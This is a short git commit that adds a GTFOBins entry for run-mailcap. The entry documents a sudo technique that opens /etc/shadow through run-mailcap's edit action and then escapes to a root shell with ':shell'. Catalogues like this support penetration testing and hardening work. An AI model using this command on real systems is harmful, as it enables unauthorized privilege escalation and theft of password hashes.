Add run-mailcap

This commit is contained in:
egre55
2018-11-12 16:12:36 +00:00
committed by Andrea Cardaci
parent df1efb0437
commit 892949d4af

7
_gtfobins/run-mailcap.md Normal file
View File

@@ -0,0 +1,7 @@
---
functions:
sudo:
- code: |
sudo run-mailcap --action=edit /etc/shadow
:shell
---